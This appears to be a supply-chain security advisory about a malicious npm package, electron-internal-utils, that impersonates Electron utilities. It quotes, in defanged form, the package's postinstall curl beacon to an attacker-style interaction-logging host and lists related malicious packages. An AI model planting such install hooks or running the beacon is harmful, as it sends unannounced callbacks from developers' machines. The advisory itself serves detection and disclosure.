electron-internal-utils@1.0.0
Malicious code in electron-internal-utils (npm)
T1195.002 · Compromise Software Supply ChainT1059.004 · Unix ShellT1071.001 · Web Protocols
Analysis
Postinstall hook in electron-internal-utils@1.0.0 executes 'curl hxxp://9ph8dp[.]ceye[.]io' — a beacon to ceye[.]io, an interactive HTTP/DNS interaction-logging service commonly used by attackers to verify remote code execution. The package contains no actual functionality (index.js is an empty stub). The package name impersonates Electron framework internal utilities to trick developers into installing it.
- analyzed by
- Leitwacht
- first seen
- Jun 14, 2026, 02:32 PM
- analyzed
- Jun 14, 2026, 02:33 PM
Related advisories
- skipthedishes_react@0.1.0
- server-up-ndot@1.0.0
- rtms-manager@1.2.0
- rtms-manager-dev@1.3.0
- request-logger-canary@1.0.0
- redux-probe-unknown-action-rce@1.0.0
- houzidawang806@1.0.1
- @wacrot/infra-data-kit@2.1.4
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.